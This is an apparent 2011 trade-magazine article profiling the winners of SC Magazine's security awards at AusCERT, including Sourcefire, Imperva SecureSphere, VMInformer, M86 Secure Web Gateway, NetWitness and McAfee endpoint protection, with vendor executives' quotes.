2011 marks the third year SC Magazine has incorporated a number of technology awards into the AusCERT gala conference and presentation. Awards receive nominations from across the industry and a panel of thirteen highly experienced security professionals decide the winners.
Vendor of the Year - Sourcefire
Sourcefire are a vendor of IPS, IDS, anti-virus solutions, anti-malware software and vulnerability research. Strongly supporting the IDS tool set of Snort and the multi-platform anti-malware solutions of ClamAV, the Sourcefire IPS product set is recognised as a best-of-breed very high speed very low latency solution.
Recently, the Sourcefire 3D8260 IPS sensor was confirmed by NSS Labs to support the delivery of up to 27.6Gbps of real-world throughput while maintaining excellent energy efficiency and low price per Mbps protected figures.
Snort, the Sourcefire IDS, uses a rule-driven language which combines the benefits of signature, protocol and anomaly-based inspection methods. ClamAV is a lightweight end-point anti-malware and anti-virus protection solution which utilises in-cloud real-time detection and analysis strategies. ClamAV has been available for non-Windows platforms for many years, and has excellent support for popular linux distributions such as Ubuntu, Fedora and OpenSUSE.
Product or Service of the Year - Imperva SecureSphere
The SecureSphere suite offers solutions which perform file activity monitoring, database activity monitoring and includes a web application firewall. Recently Imperva has introduced products to address cloud security and content control.
Imperva Cloud WAF is a cloud-based Web Application Firewall service for small to mid-enterprise businesses that need to effectively achieve PCI compliance, prevent blacklisting, protect against Web application attacks and improve Website performance.The Imperva Cloud WAF service includes around-the-clock monitoring, tuning, reporting, and incident response.
With a dedicated management platform allows the central administration, configuration and monitoring of SecureSphere deployed services, SecureSphere can be implemented as redundant scalable hardware or as virtual appliances. A lightweight host agent is available which acts as a collector of events, and can optionally engage user blockout and quarantine functionality in the event of a security violation.
Named to the Wall Street Journal Next Big Thing List Imperva have attained compliance certification in the PCI-DSS sphere through testing by ICSA Labs.
Innovation Award - VMInformer Professional
VMinformer moved to Australia from its UK start-up roots early in the company’s history and is now considered a local with its headquarters in Sydney. Providing a security assessment tool set for virtualised environments, benefits include automation functionality, centralised visibility of key security, network configuration, storage configuration as well as the identification of performance issues.
VMInformer version 2.6 has recently been released which includes a number of enhancements to the existing platform. Providing visibility into the security posture of any virtual environment, organisations using virtual computing can now demonstrate security policies and procedures are enforced regardless of the platform or virtualisation implementation.
“This version incorporates some significant improvements which our larger customers such as hosting providers and multi-national enterprises have requested” said John Reeman, CTO and founder. “The development team have improved the core functionality of rapidly providing visibility across thousands of virtualization settings with better drill-down and zoom features which makes it easier to investigate larger storage arrays used in the largest virtualized infrastructures.”
Protector Award - M86 Security Secure Web Gateway
The M86 Security Secure Web Gateway claims to be the industry’s fastest and most accurate Web 2.0 gateway, and it’s certainly not short on features. Offering traditional signature based anti-malware functionality and filters for over 90 applications, the Secure Web Gateway also implements granular social media control and Data Loss Prevention technologies with integrated AD or LDAP authentication all wrapped up with multiple deployment options and a single reporting interface.
The ability to provide centralised reporting regardless of the deployment is a strong feature - many vendors struggle to bring reports together from a mixed deployment of hardware appliances, virtualised appliances and the cloud offering.
M86 Security’s latest Threat Preditions report explained why M86 is concentrating on the Web 2.0 to keenly. “From recent cross-site scripting (XSS) and cross-site request forgery attacks to the ‘likejacking’ attacks, increase in spam and sensationalised headline applications on Facebook, cybercriminals are constantly tooling and retooling, finding ways to exploit the social networks.”
“This is because there is more success and payoff in assuming the identity of someone a user knows than in pretending to be a Nigerian Prince.”
M86 has also recently announced its own patented Real-time Code Analysis behaviour inspection technology which can be used to scan data at the gateway for operations, parameters, script manipulations and other exploitations for a given piece of content in order to determine whether that active content will potentially perform a malicious action when loaded onto the browser.
According to M86 through its Dynamic Web Repair technology it can even remove malicious content from a compromised site and provide a repaired page to the user, rather than simply block the entire page.
Gatekeeper Award - NetWitness NextGen for forensics
Recently acquired by EMC and now operating as a line of business within RSA, NetWitness is a network monitoring platform that provides enterprises a precise and actionable understanding of everything happening on the network. Information from the platform provides administrators with data on insider threats, zero-day exploits and targeted malware, advanced persistent threats, fraud, espionage, data leakage, and continuous monitoring of security controls.
Canberra based Netwitness sales director Michael Hodge tells an impressive story, claiming to be able to record “everything” through an architecture with three core components: Decoder, Concentrator and Broker. While there are many competitors in this space it is the way Netwitness collects, analyses and brokers collected data which makes it stand out.
Decoders collect and normalise network data and work with Concentrators to sort, aggregate and classify data using a complex but logical metadata framework. In turn a Broker communicates with Concentrators to run queries across the data which is then provided to other Netwitness applications and a richly featured API.
By using this infrastructure, hundreds of Decoders could be deployed in a large network which talk to tens of Concentrators providing data to a single broker. The ability for network forensics staff to drill into even the smallest event and understand how that event occurred is exceptionally powerful.
“This pervasive and accurate visibility helps organizations resolve a wide variety of the most challenging cyber-security problems, such as insider threats and fraud, electronic crime, nation-sponsored attacks and data leakage problems,” says Chief Security Officer Eddie Schwartz.
Schwartz comes from a strong security background bosting a 25-year background in information security and privacy, specialising in the financial services and federal government sectors. He has also worked as a technology management consultant for several large commercial and U.S. government entities as well as the U.S. departments of Justice and State.
SME - McAfee endpoint protection
McAfee’s endpoint protection solution is well regarded as one of the fastest, most accurate and most operating system agnostic of all anti-virus/anti-malware security companies. Protecting Windows, Mac, and Linux systems, as well as Android and Windows Mobile devices, McAfee uses a combination of signature and behavioural (reputation) algorithms to secure systems and data against sophisticated malware, botnet and zero-day attacks, as well as unauthorised applications.
McAfee’s focus on end point protection appears to be drifting from anti-virus, and the worldwide CTO George Kurtz explains why.
“Over the past years McAfee has transformed from a business focused on antivirus software to a company focused on cybersecurity as a whole. We have long moved beyond the PC and beyond simple antivirus to secure myriad endpoint devices, networks as well as the cloud. And as we have grown, with each passing year endpoint antivirus has become a smaller and smaller percentage of our overall business.”
Pamela Warren, McAfee's Global Cybercrime Strategist and Director of Public Sector and Critical Infrastructure Initiatives, clearly shares Kurtz strategy to protect end points from malware and data loss. During her presentation at AusCERT Warren proposed that by 2020 there would be 50 billion IP connected devices, 2 trillion online transactions and 4 billion connected people on the Internet - making the problem of compromised end points a great market for both the good guys and the cyber criminals.
Kurtz concluded “The exponential growth of cybercrime hasn’t been slowed in any way by the advent of newer devices – it has only accelerated as the number of potential targets has proliferated. As part of Intel we will innovate further and provide additional technologies for the world beyond the PC. We expect a 50-fold increase in connected devices over the coming decade, posing a formidable security and management challenge. We’re ready for that challenge and the opportunity.”